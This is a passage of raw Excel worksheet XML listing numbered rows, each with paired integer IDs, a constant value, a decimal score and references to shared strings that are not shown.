        <v>5482</v>
      </c>
      <c r="C2933">
        <v>5482</v>
      </c>
      <c r="D2933">
        <v>2</v>
      </c>
      <c r="E2933">
        <v>0.95639997720718384</v>
      </c>
      <c r="F2933" t="s">
        <v>5592</v>
      </c>
      <c r="G2933" t="s">
        <v>5798</v>
      </c>
      <c r="H2933" t="s">
        <v>5799</v>
      </c>
    </row>
    <row r="2934" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2934" s="1">
        <v>2932</v>
      </c>
      <c r="B2934">
        <v>3708</v>
      </c>
      <c r="C2934">
        <v>3708</v>
      </c>
      <c r="D2934">
        <v>2</v>
      </c>
      <c r="E2934">
        <v>0.98400002717971802</v>
      </c>
      <c r="F2934" t="s">
        <v>5592</v>
      </c>
      <c r="G2934" t="s">
        <v>5800</v>
      </c>
      <c r="H2934" t="s">
        <v>5801</v>
      </c>
    </row>
    <row r="2935" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2935" s="1">
        <v>2933</v>
      </c>
      <c r="B2935">
        <v>6345</v>
      </c>
      <c r="C2935">
        <v>6345</v>
      </c>
      <c r="D2935">
        <v>2</v>
      </c>
      <c r="E2935">
        <v>0.53289997577667236</v>
      </c>
      <c r="F2935" t="s">
        <v>5592</v>
      </c>
      <c r="G2935" t="s">
        <v>5802</v>
      </c>
      <c r="H2935" t="s">
        <v>5803</v>
      </c>
    </row>
    <row r="2936" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2936" s="1">
        <v>2934</v>
      </c>
      <c r="B2936">
        <v>5481</v>
      </c>
      <c r="C2936">
        <v>5481</v>
      </c>
      <c r="D2936">
        <v>2</v>
      </c>
      <c r="E2936">
        <v>0.40360000729560852</v>
      </c>
      <c r="F2936" t="s">
        <v>5592</v>
      </c>
      <c r="G2936" t="s">
        <v>5804</v>
      </c>
      <c r="H2936" t="s">
        <v>5805</v>
      </c>
    </row>
    <row r="2937" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2937" s="1">
        <v>2935</v>
      </c>
      <c r="B2937">
        <v>5591</v>
      </c>
      <c r="C2937">
        <v>5591</v>
      </c>
      <c r="D2937">
        <v>2</v>
      </c>
      <c r="E2937">
        <v>0.99659997224807739</v>
      </c>
      <c r="F2937" t="s">
        <v>5592</v>
      </c>
      <c r="G2937" t="s">
        <v>5806</v>
      </c>
      <c r="H2937" t="s">
        <v>5807</v>
      </c>
    </row>
    <row r="2938" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2938" s="1">
        <v>2936</v>
      </c>
      <c r="B2938">
        <v>3773</v>
      </c>
      <c r="C2938">
        <v>3773</v>
      </c>
      <c r="D2938">
        <v>2</v>
      </c>
      <c r="E2938">
        <v>0.93589997291564941</v>
      </c>
      <c r="F2938" t="s">
        <v>5592</v>
      </c>
      <c r="G2938" t="s">
        <v>5808</v>
      </c>
      <c r="H2938" t="s">
        <v>5809</v>
      </c>
    </row>
    <row r="2939" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2939" s="1">
        <v>2937</v>
      </c>
      <c r="B2939">
        <v>5600</v>
      </c>
      <c r="C2939">
        <v>5600</v>
      </c>
      <c r="D2939">
        <v>2</v>
      </c>
      <c r="E2939">
        <v>0.73949998617172241</v>
      </c>
      <c r="F2939" t="s">
        <v>5592</v>
      </c>
      <c r="G2939" t="s">
        <v>5810</v>
      </c>
      <c r="H2939" t="s">
        <v>5811</v>
      </c>
    </row>
    <row r="2940" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2940" s="1">
        <v>2938</v>
      </c>
      <c r="B2940">
        <v>3898</v>
      </c>
      <c r="C2940">
        <v>3898</v>
      </c>
      <c r="D2940">
        <v>2</v>
      </c>
      <c r="E2940">
        <v>0.99379998445510864</v>
      </c>
      <c r="F2940" t="s">
        <v>5592</v>
      </c>
      <c r="G2940" t="s">
        <v>5812</v>
      </c>
      <c r="H2940" t="s">
        <v>5813</v>
      </c>
    </row>
    <row r="2941" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2941" s="1">
        <v>2939</v>
      </c>
      <c r="B2941">
        <v>5417</v>
      </c>
      <c r="C2941">
        <v>5417</v>
      </c>
      <c r="D2941">
        <v>2</v>
      </c>
      <c r="E2941">
        <v>0.99459999799728394</v>
      </c>
      <c r="F2941" t="s">
        <v>5592</v>
      </c>
      <c r="G2941" t="s">
        <v>5814</v>
      </c>
      <c r="H2941" t="s">
        <v>5815</v>
      </c>
    </row>
    <row r="2942" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2942" s="1">
        <v>2940</v>
      </c>
      <c r="B2942">
        <v>5478</v>
      </c>
      <c r="C2942">
        <v>5478</v>
      </c>
      <c r="D2942">
        <v>2</v>
      </c>
      <c r="E2942">
        <v>0.99379998445510864</v>
      </c>
      <c r="F2942" t="s">
        <v>5592</v>
      </c>
      <c r="G2942" t="s">
        <v>5816</v>
      </c>
      <c r="H2942" t="s">
        <v>5817</v>
      </c>
    </row>
    <row r="2943" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2943" s="1">
        <v>2941</v>
      </c>
      <c r="B2943">
        <v>3774</v>
      </c>
      <c r="C2943">
        <v>3774</v>
      </c>
      <c r="D2943">
        <v>2</v>
      </c>
      <c r="E2943">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2943" t="s">
        <v>5592</v>
      </c>
      <c r="G2943" t="s">
        <v>5818</v>
      </c>
      <c r="H2943" t="s">
        <v>5819</v>
      </c>
    </row>
    <row r="2944" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2944" s="1">
        <v>2942</v>
      </c>
      <c r="B2944">
        <v>6294</v>
      </c>
      <c r="C2944">
        <v>6294</v>
      </c>
      <c r="D2944">
        <v>2</v>
      </c>
      <c r="E2944">
        <v>0.62430000305175781</v>
      </c>
      <c r="F2944" t="s">
        <v>5592</v>
      </c>
      <c r="G2944" t="s">
        <v>5820</v>
      </c>
      <c r="H2944" t="s">
        <v>5821</v>
      </c>
    </row>
    <row r="2945" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2945" s="1">
        <v>2943</v>
      </c>
      <c r="B2945">
        <v>3709</v>
      </c>
      <c r="C2945">
        <v>3709</v>
      </c>
      <c r="D2945">
        <v>2</v>
      </c>
      <c r="E2945">
        <v>0.58350002765655518</v>
      </c>
      <c r="F2945" t="s">
        <v>5592</v>
      </c>
      <c r="G2945" t="s">
        <v>5822</v>
      </c>
      <c r="H2945" t="s">
        <v>5823</v>
      </c>
    </row>
    <row r="2946" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2946" s="1">
        <v>2944</v>
      </c>
      <c r="B2946">
        <v>3775</v>
      </c>
      <c r="C2946">
        <v>3775</v>
      </c>
      <c r="D2946">
        <v>2</v>
      </c>
      <c r="E2946">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2946" t="s">
        <v>5592</v>
      </c>
      <c r="G2946" t="s">
        <v>5824</v>
      </c>
      <c r="H2946" t="s">
        <v>5825</v>
      </c>
    </row>
    <row r="2947" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2947" s="1">
        <v>2945</v>
      </c>
      <c r="B2947">
        <v>6293</v>
      </c>
      <c r="C2947">
        <v>6293</v>
      </c>
      <c r="D2947">
        <v>2</v>
      </c>
      <c r="E2947">
        <v>0.73390001058578491</v>
      </c>
      <c r="F2947" t="s">
        <v>5592</v>
      </c>
      <c r="G2947" t="s">
        <v>5826</v>
      </c>
      <c r="H2947" t="s">
        <v>5827</v>
      </c>
    </row>
    <row r="2948" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2948" s="1">
        <v>2946</v>
      </c>
      <c r="B2948">
        <v>3908</v>
      </c>
      <c r="C2948">
        <v>3908</v>
      </c>
      <c r="D2948">
        <v>2</v>
      </c>
      <c r="E2948">
        <v>0.96950000524520874</v>
      </c>
      <c r="F2948" t="s">
        <v>5592</v>
      </c>
      <c r="G2948" t="s">
        <v>5828</v>
      </c>
      <c r="H2948" t="s">
        <v>5829</v>
      </c>
    </row>
    <row r="2949" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2949" s="1">
        <v>2947</v>
      </c>
      <c r="B2949">
        <v>3903</v>
      </c>
      <c r="C2949">
        <v>3903</v>
      </c>
      <c r="D2949">
        <v>2</v>
      </c>
      <c r="E2949">
        <v>0.59460002183914185</v>
      </c>
      <c r="F2949" t="s">
        <v>5592</v>
      </c>
      <c r="G2949" t="s">
        <v>5830</v>
      </c>
      <c r="H2949" t="s">
        <v>5831</v>
      </c>
    </row>
    <row r="2950" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2950" s="1">
        <v>2948</v>
      </c>
      <c r="B2950">
        <v>5416</v>
      </c>
      <c r="C2950">
        <v>5416</v>
      </c>
      <c r="D2950">
        <v>2</v>
      </c>
      <c r="E2950">
        <v>0.99459999799728394</v>
      </c>
      <c r="F2950" t="s">
        <v>5592</v>
      </c>
      <c r="G2950" t="s">
        <v>5832</v>
      </c>
      <c r="H2950" t="s">
        <v>5815</v>
      </c>
    </row>
    <row r="2951" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2951" s="1">
        <v>2949</v>
      </c>
      <c r="B2951">
        <v>3720</v>
      </c>
      <c r="C2951">
        <v>3720</v>
      </c>
      <c r="D2951">
        <v>2</v>
      </c>
      <c r="E2951">
        <v>0.98909997940063477</v>
      </c>
      <c r="F2951" t="s">
        <v>5592</v>
      </c>
      <c r="G2951" t="s">
        <v>5833</v>
      </c>
      <c r="H2951" t="s">
        <v>5834</v>
      </c>
    </row>
    <row r="2952" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2952" s="1">
        <v>2950</v>
      </c>
      <c r="B2952">
        <v>3848</v>
      </c>
      <c r="C2952">
        <v>3848</v>
      </c>
      <c r="D2952">
        <v>2</v>
      </c>
      <c r="E2952">
        <v>0.77700001001358032</v>
      </c>
      <c r="F2952" t="s">
        <v>5592</v>
      </c>
      <c r="G2952" t="s">
        <v>5835</v>
      </c>
      <c r="H2952" t="s">
        <v>5836</v>
      </c>
    </row>
    <row r="2953" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2953" s="1">
        <v>2951</v>
      </c>
      <c r="B2953">
        <v>6272</v>
      </c>
      <c r="C2953">
        <v>6272</v>
      </c>
      <c r="D2953">
        <v>2</v>
      </c>
      <c r="E2953">
        <v>0.99589997529983521</v>
      </c>
      <c r="F2953" t="s">
        <v>5592</v>
      </c>
      <c r="G2953" t="s">
        <v>5837</v>
      </c>
      <c r="H2953" t="s">
        <v>5838</v>
      </c>
    </row>
    <row r="2954" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2954" s="1">
        <v>2952</v>
      </c>
      <c r="B2954">
        <v>6329</v>
      </c>
      <c r="C2954">
        <v>6329</v>
      </c>
      <c r="D2954">
        <v>2</v>
      </c>
      <c r="E2954">
        <v>0.49099999666213989</v>
      </c>
      <c r="F2954" t="s">
        <v>5592</v>
      </c>
      <c r="G2954" t="s">
        <v>5839</v>
      </c>
      <c r="H2954" t="s">
        <v>5840</v>
      </c>
    </row>
    <row r="2955" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2955" s="1">
        <v>2953</v>
      </c>
      <c r="B2955">
        <v>5497</v>
      </c>
      <c r="C2955">
        <v>5497</v>
      </c>
      <c r="D2955">
        <v>2</v>
      </c>
      <c r="E2955">
        <v>0.75059998035430908</v>
      </c>
      <c r="F2955" t="s">
        <v>5592</v>
      </c>
      <c r="G2955" t="s">
        <v>5841</v>
      </c>
      <c r="H2955" t="s">
        <v>5842</v>
      </c>
    </row>
    <row r="2956" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2956" s="1">
        <v>2954</v>
      </c>
      <c r="B2956">
        <v>3905</v>
      </c>
      <c r="C2956">
        <v>3905</v>
      </c>
      <c r="D2956">
        <v>2</v>
      </c>
      <c r="E2956">
        <v>0.99489998817443848</v>
      </c>
      <c r="F2956" t="s">
        <v>5592</v>
      </c>
      <c r="G2956" t="s">
        <v>5843</v>
      </c>
      <c r="H2956" t="s">
        <v>5844</v>
      </c>
    </row>
    <row r="2957" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2957" s="1">
        <v>2955</v>
      </c>
      <c r="B2957">
        <v>3723</v>
      </c>
      <c r="C2957">
        <v>3723</v>
      </c>
      <c r="D2957">
        <v>2</v>
      </c>
      <c r="E2957">
        <v>0.69580000638961792</v>
      </c>
      <c r="F2957" t="s">
        <v>5592</v>
      </c>
      <c r="G2957" t="s">
        <v>5845</v>
      </c>
      <c r="H2957" t="s">
        <v>5846</v>
      </c>
    </row>
    <row r="2958" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2958" s="1">
        <v>2956</v>
      </c>
      <c r="B2958">
        <v>3724</v>
      </c>
      <c r="C2958">
        <v>3724</v>
      </c>
      <c r="D2958">
        <v>2</v>
      </c>
      <c r="E2958">
        <v>0.60559999942779541</v>
      </c>
      <c r="F2958" t="s">
        <v>5592</v>
      </c>
      <c r="G2958" t="s">
        <v>5847</v>
      </c>
      <c r="H2958" t="s">
        <v>5662</v>
      </c>
    </row>
    <row r="2959" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2959" s="1">
        <v>2957</v>
      </c>
      <c r="B2959">
        <v>5589</v>
      </c>
      <c r="C2959">
        <v>5589</v>
      </c>
      <c r="D2959">
        <v>2</v>
      </c>
      <c r="E2959">
        <v>0.9562000036239624</v>
      </c>
      <c r="F2959" t="s">
        <v>5592</v>
      </c>
      <c r="G2959" t="s">
        <v>5848</v>
      </c>
      <c r="H2959" t="s">
        <v>5849</v>
      </c>
    </row>
    <row r="2960" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2960" s="1">
        <v>2958</v>
      </c>
      <c r="B2960">
        <v>3726</v>
      </c>
      <c r="C2960">
        <v>3726</v>
      </c>
      <c r="D2960">
        <v>2</v>
      </c>
      <c r="E2960">
        <v>0.98849999904632568</v>
      </c>
      <c r="F2960" t="s">
        <v>5592</v>
      </c>
      <c r="G2960" t="s">
        <v>5850</v>
      </c>
      <c r="H2960" t="s">
        <v>5851</v>
      </c>
    </row>
    <row r="2961" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2961" s="1">
        <v>2959</v>
      </c>
      <c r="B2961">
        <v>3725</v>
      </c>
      <c r="C2961">
        <v>3725</v>
      </c>
      <c r="D2961">
        <v>2</v>
      </c>
      <c r="E2961">
        <v>0.99000000953674316</v>
      </c>
      <c r="F2961" t="s">
        <v>5592</v>
      </c>
      <c r="G2961" t="s">
        <v>5852</v>
      </c>
      <c r="H2961" t="s">
        <v>5853</v>
      </c>
    </row>
    <row r="2962" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2962" s="1">
        <v>2960</v>
      </c>
      <c r="B2962">
        <v>3906</v>
      </c>
      <c r="C2962">
        <v>3906</v>
      </c>
      <c r="D2962">
        <v>2</v>
      </c>
      <c r="E2962">
        <v>0.98710000514984131</v>
      </c>
      <c r="F2962" t="s">
        <v>5592</v>
      </c>
      <c r="G2962" t="s">
        <v>5854</v>
      </c>
      <c r="H2962" t="s">
        <v>5855</v>
      </c>
    </row>
    <row r="2963" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2963" s="1">
        <v>2961</v>
      </c>
      <c r="B2963">
        <v>5603</v>
      </c>
      <c r="C2963">
        <v>5603</v>
      </c>
      <c r="D2963">
        <v>2</v>
      </c>
      <c r="E2963">
        <v>0.94880002737045288</v>
      </c>
      <c r="F2963" t="s">
        <v>5592</v>
      </c>
      <c r="G2963" t="s">
        <v>5856</v>
      </c>
      <c r="H2963" t="s">
        <v>5857</v>
      </c>
    </row>
    <row r="2964" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2964" s="1">
        <v>2962</v>
      </c>
      <c r="B2964">
        <v>3844</v>
      </c>
      <c r="C2964">
        <v>3844</v>
      </c>
      <c r="D2964">
        <v>2</v>
      </c>
      <c r="E2964">
        <v>0.696399986743927</v>
      </c>
      <c r="F2964" t="s">
        <v>5592</v>
      </c>
      <c r="G2964" t="s">
        <v>5858</v>
      </c>
      <c r="H2964" t="s">
        <v>5859</v>
      </c>
    </row>
    <row r="2965" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2965" s="1">
        <v>2963</v>
      </c>
      <c r="B2965">
        <v>5588</v>
      </c>
      <c r="C2965">
        <v>5588</v>
      </c>
      <c r="D2965">
        <v>2</v>
      </c>
      <c r="E2965">
        <v>0.98949998617172241</v>
      </c>
      <c r="F2965" t="s">
        <v>5592</v>
      </c>
      <c r="G2965" t="s">
        <v>5860</v>
      </c>
      <c r="H2965" t="s">
        <v>5861</v>
      </c>
    </row>
    <row r="2966" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2966" s="1">
        <v>2964</v>
      </c>
      <c r="B2966">
        <v>5607</v>
      </c>
      <c r="C2966">
        <v>5607</v>
      </c>
      <c r="D2966">
        <v>2</v>
      </c>
      <c r="E2966">
        <v>0.60650002956390381</v>
      </c>
      <c r="F2966" t="s">
        <v>5592</v>
      </c>
      <c r="G2966" t="s">
        <v>5862</v>
      </c>
      <c r="H2966" t="s">
        <v>5863</v>
      </c>
    </row>
    <row r="2967" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2967" s="1">
        <v>2965</v>
      </c>
      <c r="B2967">
        <v>3843</v>
      </c>
      <c r="C2967">
        <v>3843</v>
      </c>
      <c r="D2967">
        <v>2</v>
      </c>
      <c r="E2967">
        <v>0.76740002632141113</v>
      </c>
      <c r="F2967" t="s">
        <v>5592</v>
      </c>
      <c r="G2967" t="s">
        <v>5864</v>
      </c>
      <c r="H2967" t="s">
        <v>5865</v>
      </c>
    </row>
    <row r="2968" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2968" s="1">
        <v>2966</v>
      </c>
      <c r="B2968">
        <v>5608</v>
      </c>
      <c r="C2968">
        <v>5608</v>
      </c>
      <c r="D2968">
        <v>2</v>
      </c>
      <c r="E2968">
        <v>0.37569999694824219</v>
      </c>
      <c r="F2968" t="s">
        <v>5592</v>
      </c>
      <c r="G2968" t="s">
        <v>5866</v>
      </c>
      <c r="H2968" t="s">
        <v>5867</v>
      </c>
    </row>
    <row r="2969" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2969" s="1">
        <v>2967</v>
      </c>
      <c r="B2969">
        <v>3715</v>
      </c>
      <c r="C2969">
        <v>3715</v>
      </c>
      <c r="D2969">
        <v>2</v>
      </c>
      <c r="E2969">
        <v>0.65299999713897705</v>
      </c>
      <c r="F2969" t="s">
        <v>5592</v>
      </c>
      <c r="G2969" t="s">
        <v>5868</v>
      </c>
      <c r="H2969" t="s">
        <v>5869</v>
      </c>
    </row>
    <row r="2970" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2970" s="1">
        <v>2968</v>
      </c>
      <c r="B2970">
        <v>3907</v>
      </c>
      <c r="C2970">
        <v>3907</v>
      </c>
      <c r="D2970">
        <v>2</v>
      </c>
      <c r="E2970">
        <v>0.98259997367858887</v>
      </c>
      <c r="F2970" t="s">
        <v>5592</v>
      </c>
      <c r="G2970" t="s">
        <v>5870</v>
      </c>
      <c r="H2970" t="s">
        <v>5871</v>
      </c>
    </row>
    <row r="2971" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2971" s="1">
        <v>2969</v>
      </c>
      <c r="B2971">
        <v>3759</v>
      </c>
      <c r="C2971">
        <v>3759</v>
      </c>
      <c r="D2971">
        <v>2</v>
      </c>
      <c r="E2971">
        <v>0.86680001020431519</v>
      </c>
      <c r="F2971" t="s">
        <v>5592</v>
      </c>
      <c r="G2971" t="s">
        <v>5872</v>
      </c>
      <c r="H2971" t="s">
        <v>5873</v>
      </c>
    </row>
    <row r="2972" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2972" s="1">
        <v>2970</v>
      </c>
      <c r="B2972">
        <v>5640</v>
      </c>
      <c r="C2972">
        <v>5640</v>
      </c>
      <c r="D2972">
        <v>2</v>
      </c>
      <c r="E2972">
        <v>0.99720001220703125</v>
      </c>
      <c r="F2972" t="s">
        <v>5592</v>
      </c>
      <c r="G2972" t="s">
        <v>5874</v>
      </c>
      <c r="H2972" t="s">
        <v>5875</v>
      </c>
    </row>
    <row r="2973" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2973" s="1">
        <v>2971</v>
      </c>
      <c r="B2973">
        <v>3845</v>
      </c>
      <c r="C2973">
        <v>3845</v>
      </c>
      <c r="D2973">
        <v>2</v>
      </c>
      <c r="E2973">
        <v>0.77369999885559082</v>
      </c>
      <c r="F2973" t="s">
        <v>5592</v>
      </c>
      <c r="G2973" t="s">
        <v>5876</v>
      </c>
      <c r="H2973" t="s">
        <v>5877</v>
      </c>
    </row>
    <row r="2974" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2974" s="1">
        <v>2972</v>
      </c>
      <c r="B2974">
        <v>3857</v>
      </c>
      <c r="C2974">
        <v>3857</v>
      </c>
      <c r="D2974">
        <v>2</v>
      </c>
      <c r="E2974">
        <v>0.73329997062683105</v>
      </c>
      <c r="F2974" t="s">
        <v>5592</v>
      </c>
      <c r="G2974" t="s">
        <v>5878</v>
      </c>
      <c r="H2974" t="s">
        <v>5879</v>
      </c>
    </row>
    <row r="2975" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2975" s="1">
        <v>2973</v>
      </c>
      <c r="B2975">
        <v>3705</v>
      </c>
      <c r="C2975">
        <v>3705</v>
      </c>
      <c r="D2975">
        <v>2</v>
      </c>
      <c r="E2975">
        <v>0.7149999737739563</v>
      </c>
      <c r="F2975" t="s">
        <v>5592</v>
      </c>
      <c r="G2975" t="s">
        <v>5880</v>
      </c>
      <c r="H2975" t="s">
        <v>5881</v>
      </c>
    </row>
    <row r="2976" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2976" s="1">
        <v>2974</v>
      </c>
      <c r="B2976">
        <v>3897</v>
      </c>
      <c r="C2976">
        <v>3897</v>
      </c>
      <c r="D2976">
        <v>2</v>
      </c>
      <c r="E2976">
        <v>0.53609997034072876</v>
      </c>
      <c r="F2976" t="s">
        <v>5592</v>
      </c>
      <c r="G2976" t="s">
        <v>5882</v>
      </c>
      <c r="H2976" t="s">
        <v>5883</v>
      </c>
    </row>
    <row r="2977" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2977" s="1">
        <v>2975</v>
      </c>
      <c r="B2977">
        <v>5469</v>
      </c>
      <c r="C2977">
        <v>5469</v>
      </c>
      <c r="D2977">
        <v>2</v>
      </c>
      <c r="E2977">
        <v>0.89960002899169922</v>
      </c>
      <c r="F2977" t="s">
        <v>5592</v>
      </c>
      <c r="G2977" t="s">
        <v>5884</v>
      </c>
      <c r="H2977" t="s">
        <v>5885</v>
      </c>
    </row>
    <row r="2978" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2978" s="1">
        <v>2976</v>
      </c>
      <c r="B2978">
        <v>5528</v>
      </c>
      <c r="C2978">
        <v>5528</v>
      </c>
      <c r="D2978">
        <v>2</v>
      </c>
      <c r="E2978">
        <v>0.99210000038146973</v>
      </c>
      <c r="F2978" t="s">
        <v>5592</v>
      </c>
      <c r="G2978" t="s">
        <v>5886</v>
      </c>
      <c r="H2978" t="s">
        <v>5887</v>
      </c>
    </row>
    <row r="2979" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2979" s="1">
        <v>2977</v>
      </c>
      <c r="B2979">
        <v>3894</v>
      </c>
      <c r="C2979">
        <v>3894</v>
      </c>
      <c r="D2979">
        <v>2</v>
      </c>
      <c r="E2979">
        <v>0.96340000629425049</v>
      </c>
      <c r="F2979" t="s">
        <v>5592</v>
      </c>
      <c r="G2979" t="s">
        <v>5888</v>
      </c>
      <c r="H2979" t="s">
        <v>5889</v>
      </c>
    </row>
    <row r="2980" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2980" s="1">
        <v>2978</v>
      </c>
      <c r="B2980">
        <v>6346</v>
      </c>
      <c r="C2980">
        <v>6346</v>
      </c>
      <c r="D2980">
        <v>2</v>
      </c>
      <c r="E2980">
        <v>0.99790000915527344</v>
      </c>
      <c r="F2980" t="s">
        <v>5592</v>
      </c>
      <c r="G2980" t="s">
        <v>5890</v>
      </c>
      <c r="H2980" t="s">
        <v>5891</v>
      </c>
    </row>
    <row r="2981" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2981" s="1">
        <v>2979</v>
      </c>
      <c r="B2981">
        <v>5657</v>
      </c>
      <c r="C2981">
        <v>5657</v>
      </c>
      <c r="D2981">
        <v>2</v>
      </c>
      <c r="E2981">
        <v>0.9934999942779541</v>
      </c>
      <c r="F2981" t="s">
        <v>5592</v>
      </c>
      <c r="G2981" t="s">
        <v>5892</v>
      </c>
      <c r="H2981" t="s">
        <v>5893</v>
      </c>
    </row>
    <row r="2982" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2982" s="1">
        <v>2980</v>
      </c>
      <c r="B2982">
        <v>5586</v>
      </c>
      <c r="C2982">
        <v>5586</v>
      </c>
      <c r="D2982">
        <v>2</v>
      </c>
      <c r="E2982">
        <v>0.81180000305175781</v>
      </c>
      <c r="F2982" t="s">
        <v>5592</v>
      </c>
      <c r="G2982" t="s">
        <v>5894</v>
      </c>
      <c r="H2982" t="s">
        <v>5895</v>
      </c>
    </row>
    <row r="2983" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2983" s="1">
        <v>2981</v>
      </c>
      <c r="B2983">
        <v>5468</v>
      </c>
      <c r="C2983">
        <v>5468</v>
      </c>
      <c r="D2983">
        <v>2</v>
      </c>
      <c r="E2983">
        <v>0.98669999837875366</v>
      </c>
      <c r="F2983" t="s">
        <v>5592</v>
      </c>
      <c r="G2983" t="s">
        <v>5896</v>
      </c>
      <c r="H2983" t="s">
        <v>5897</v>
      </c>
    </row>
    <row r="2984" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2984" s="1">
        <v>2982</v>
      </c>
      <c r="B2984">
        <v>5585</v>
      </c>
      <c r="C2984">
        <v>5585</v>
      </c>
      <c r="D2984">
        <v>2</v>
      </c>
      <c r="E2984">
        <v>0.84460002183914185</v>
      </c>
      <c r="F2984" t="s">
        <v>5592</v>
      </c>
      <c r="G2984" t="s">
        <v>5898</v>
      </c>
      <c r="H2984" t="s">
        <v>5899</v>
      </c>
    </row>
    <row r="2985" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2985" s="1">
        <v>2983</v>
      </c>
      <c r="B2985">
        <v>5527</v>
      </c>
      <c r="C2985">
        <v>5527</v>
      </c>
      <c r="D2985">
        <v>2</v>
      </c>
      <c r="E2985">
        <v>0.81260001659393311</v>
      </c>
      <c r="F2985" t="s">
        <v>5592</v>
      </c>
      <c r="G2985" t="s">
        <v>5900</v>
      </c>
      <c r="H2985" t="s">
        <v>5901</v>
      </c>
    </row>
    <row r="2986" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2986" s="1">
        <v>2984</v>
      </c>
      <c r="B2986">
        <v>5584</v>
      </c>
      <c r="C2986">
        <v>5584</v>
      </c>
      <c r="D2986">
        <v>2</v>
      </c>
      <c r="E2986">
        <v>0.42649999260902399</v>
      </c>
      <c r="F2986" t="s">
        <v>5592</v>
      </c>
      <c r="G2986" t="s">
        <v>5902</v>
      </c>
      <c r="H2986" t="s">
        <v>5903</v>
      </c>
    </row>
    <row r="2987" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2987" s="1">
        <v>2985</v>
      </c>
      <c r="B2987">
        <v>5437</v>
      </c>
      <c r="C2987">
        <v>5437</v>
      </c>
      <c r="D2987">
        <v>2</v>
      </c>
      <c r="E2987">
        <v>0.89429998397827148</v>
      </c>
      <c r="F2987" t="s">
        <v>5592</v>
      </c>
      <c r="G2987" t="s">
        <v>5904</v>
      </c>
      <c r="H2987" t="s">
        <v>5905</v>
      </c>
    </row>
    <row r="2988" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2988" s="1">
        <v>2986</v>
      </c>
      <c r="B2988">
        <v>3895</v>
      </c>
      <c r="C2988">
        <v>3895</v>
      </c>
      <c r="D2988">
        <v>2</v>
      </c>
      <c r="E2988">
        <v>0.991100013256073</v>
      </c>
      <c r="F2988" t="s">
        <v>5592</v>
      </c>
      <c r="G2988" t="s">
        <v>5906</v>
      </c>
      <c r="H2988" t="s">
        <v>5907</v>
      </c>
    </row>
    <row r="2989" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2989" s="1">
        <v>2987</v>
      </c>
      <c r="B2989">
        <v>3722</v>
      </c>
      <c r="C2989">
        <v>3722</v>
      </c>
      <c r="D2989">
        <v>2</v>
      </c>
      <c r="E2989">
        <v>0.81150001287460327</v>
      </c>
      <c r="F2989" t="s">
        <v>5592</v>
      </c>
      <c r="G2989" t="s">
        <v>5908</v>
      </c>
      <c r="H2989" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="2990" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2990" s="1">
        <v>2988</v>
      </c>
      <c r="B2990">
        <v>5551</v>
      </c>
      <c r="C2990">
        <v>5551</v>
      </c>
      <c r="D2990">
        <v>2</v>
      </c>
      <c r="E2990">
        <v>0.70209997892379761</v>
      </c>
      <c r="F2990" t="s">
        <v>5592</v>
      </c>
      <c r="G2990" t="s">
        <v>5910</v>
      </c>
      <c r="H2990" t="s">
        <v>5911</v>
      </c>
    </row>
    <row r="2991" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2991" s="1">
        <v>2989</v>
      </c>
      <c r="B2991">
        <v>5466</v>
      </c>
      <c r="C2991">
        <v>5466</v>
      </c>
      <c r="D2991">
        <v>2</v>
      </c>
      <c r="E2991">
        <v>0.5471000075340271</v>
      </c>
